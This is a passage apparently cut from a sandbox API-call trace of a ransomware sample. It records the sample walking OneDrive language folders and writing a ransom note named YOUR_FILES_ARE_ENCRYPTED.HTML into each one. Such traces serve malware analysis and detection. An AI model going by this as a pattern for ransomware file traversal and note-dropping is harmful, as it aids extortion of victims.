lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk\\*" [0111.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x944bfdaf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x944bfdaf, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94e232ee, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.674] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x944bfdaf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x944bfdaf, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94e232ee, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.674] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e232ee, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94e232ee, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x952c1a4e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.674] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.674] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.674] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.674] lstrlenW (lpString=".mui") returned 4 [0111.674] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.674] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e232ee, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94e232ee, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x952c1a4e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.674] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.674] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.674] GetProcessHeap () returned 0x600000 [0111.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.675] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.676] CloseHandle (hObject=0x334) returned 1 [0111.677] GetProcessHeap () returned 0x600000 [0111.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.677] GetProcessHeap () returned 0x600000 [0111.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.678] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95c97643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x95c97643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x95c97643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="km-kh", cAlternateFileName="")) returned 1 [0111.678] StrStrIW (lpFirst="km-kh", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.678] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh") returned 79 [0111.678] GetProcessHeap () returned 0x600000 [0111.678] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.679] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh" [0111.679] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh\\*" [0111.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95c97643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x95c97643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x962b3645, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.686] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95c97643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x95c97643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x962b3645, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.686] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x962b3645, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x962b3645, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x96647060, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.686] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.686] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 115 [0111.686] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.686] lstrlenW (lpString=".mui") returned 4 [0111.686] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.686] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x962b3645, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x962b3645, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x96647060, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.686] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.687] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0111.687] GetProcessHeap () returned 0x600000 [0111.687] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.688] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.689] CloseHandle (hObject=0x334) returned 1 [0111.689] GetProcessHeap () returned 0x600000 [0111.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.689] GetProcessHeap () returned 0x600000 [0111.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.690] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x967520dd, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x967520dd, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x967520dd, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kn", cAlternateFileName="")) returned 1 [0111.690] StrStrIW (lpFirst="kn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.690] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn") returned 76 [0111.690] GetProcessHeap () returned 0x600000 [0111.690] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.692] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn" [0111.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn\\*" [0111.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x967520dd, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x967520dd, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x96f11a4d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626838 [0111.692] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x967520dd, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x967520dd, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x96f11a4d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.692] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f11a4d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x96f11a4d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x97317979, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.692] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.692] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.692] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.692] lstrlenW (lpString=".mui") returned 4 [0111.692] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.692] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f11a4d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x96f11a4d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x97317979, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.692] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0111.693] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.693] GetProcessHeap () returned 0x600000 [0111.693] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.693] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.694] CloseHandle (hObject=0x334) returned 1 [0111.695] GetProcessHeap () returned 0x600000 [0111.695] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.695] GetProcessHeap () returned 0x600000 [0111.695] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.696] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x973d65a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x973d65a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x973d65a1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ko", cAlternateFileName="")) returned 1 [0111.696] StrStrIW (lpFirst="ko", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.696] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko") returned 76 [0111.696] GetProcessHeap () returned 0x600000 [0111.696] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.697] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko" [0111.697] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko\\*" [0111.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x973d65a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x973d65a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x97a3ea55, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.698] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x973d65a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x973d65a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x97a3ea55, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.698] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3ea55, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x97a3ea55, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x97edd415, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.698] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.698] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.699] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.699] lstrlenW (lpString=".mui") returned 4 [0111.699] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.699] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3ea55, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x97a3ea55, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x97edd415, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.699] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.699] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.699] GetProcessHeap () returned 0x600000 [0111.699] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.700] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.700] CloseHandle (hObject=0x334) returned 1 [0111.701] GetProcessHeap () returned 0x600000 [0111.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.701] GetProcessHeap () returned 0x600000 [0111.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.702] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x980cd2db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x980cd2db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kok", cAlternateFileName="")) returned 1 [0111.702] StrStrIW (lpFirst="kok", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.702] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok") returned 77 [0111.702] GetProcessHeap () returned 0x600000 [0111.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.703] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok" [0111.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok\\*" [0111.703] FindFirstFileW (in: 